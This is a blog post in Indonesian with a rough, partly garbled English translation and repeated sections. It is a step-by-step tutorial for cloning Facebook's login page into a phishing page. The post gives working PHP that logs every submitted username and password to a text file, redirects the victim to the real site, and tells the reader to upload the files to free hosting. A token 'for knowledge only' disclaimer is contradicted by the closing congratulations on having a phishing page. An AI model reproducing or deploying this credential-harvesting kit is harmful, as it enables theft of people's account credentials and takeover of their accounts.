In Indonesia :
Nih Gan saya share Cara Membuat Phising.. Phising adalah cara untuk menghack facebook orang.. Jadikan ini sebagai ilmu pengetahuan saja jangan buat hack facebook orang.. Langsung aja gan..
1. Buka Disini
2. Klik Kanan >> View Page Source atau tekan CTRL + U
3. Copy semua kode yang ada disitu kemudian paste ke notepad
4. Tekan CTRL + F kemudian cari kata action=
5..Ubah.action="https://www.facebook.com/login.php?login_attempt=1" menjadi action="next.php" .. Ubah juga method dari POST menjadi get
6. Simpan notepad ini dengan nama login.php
7. Buat notepad baru kemudian isikan kode berikut
Note: ubah http://www.Facebook.com/login.php menjadi alamat web yang anda inginkan
8. Simpan Dengan Nama next.php
9. Buat notepad baru lagi .. isikan dengan huruf L >> Kemudian simpan dengan nama pass.txt
10. Kemudian Upload ke tiga file tersebut ke Disini atau ke alamat free hosting lainnya
Selamat sekarang anda mempunyai phising page.. !!
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Note: ubah http://www.Facebook.com/login.php menjadi alamat web yang anda inginkan
8. Simpan Dengan Nama next.php
9. Buat notepad baru lagi .. isikan dengan huruf L >> Kemudian simpan dengan nama pass.txt
10. Kemudian Upload ke tiga file tersebut ke Disini atau ke alamat free hosting lainnya
Selamat sekarang anda mempunyai phising page.. !!
In English :
Here I share web Phishing How To Make .. Phishing is a way to hack facebook .. Make this as a science just do not make a hack facebook.
1. Open Here
2. Right Click>> View Page Source or press CTRL + U
3. Copy all the code is there then paste it into notepad
4. Press CTRL + F and search for the word action =
5 .. Ubah.action = "https://www.facebook.com/login.php?login_attempt=1" to action = "next.php" .. Change as well method from POST to get
6. Keep a notepad with the name of login.php
7. Create a new notepad and then input the following code
<? php
header ("Location: http://www.Facebook.com/login.php");
$ handle = fopen ("pass.txt", "a");
foreach ($ _GET as $ variable => $ value) {
fwrite ($ handle, $ variable);
fwrite ($ handle, "=");
fwrite ($ handle, $ value);
fwrite ($ handle, "\ r \ n");
}
fwrite ($ handle, "\ r \ n");
fclose ($ handle);
exit;
?>
Note: change http://www.Facebook.com/login.php a web address you want
8. Save With Name next.php
9. Create a new notepad again .. fill with the letter L>> Then save it as pass.txt
10. Later additions to the three file to here or to address other free hosting
Congratulations you now have a phishing page .. !
1. Open Here
2. Right Click>> View Page Source or press CTRL + U
3. Copy all the code is there then paste it into notepad
4. Press CTRL + F and search for the word action =
5 .. Ubah.action = "https://www.facebook.com/login.php?login_attempt=1" to action = "next.php" .. Change as well method from POST to get
6. Keep a notepad with the name of login.php
7. Create a new notepad and then input the following code
<? php
header ("Location: http://www.Facebook.com/login.php");
$ handle = fopen ("pass.txt", "a");
foreach ($ _GET as $ variable => $ value) {
fwrite ($ handle, $ variable);
fwrite ($ handle, "=");
fwrite ($ handle, $ value);
fwrite ($ handle, "\ r \ n");
}
fwrite ($ handle, "\ r \ n");
fclose ($ handle);
exit;
?>
Note: change http://www.Facebook.com/login.php a web address you want
8. Save With Name next.php
9. Create a new notepad again .. fill with the letter L>> Then save it as pass.txt
10. Later additions to the three file to here or to address other free hosting
Congratulations you now have a phishing page .. !
Tidak ada komentar:
Posting Komentar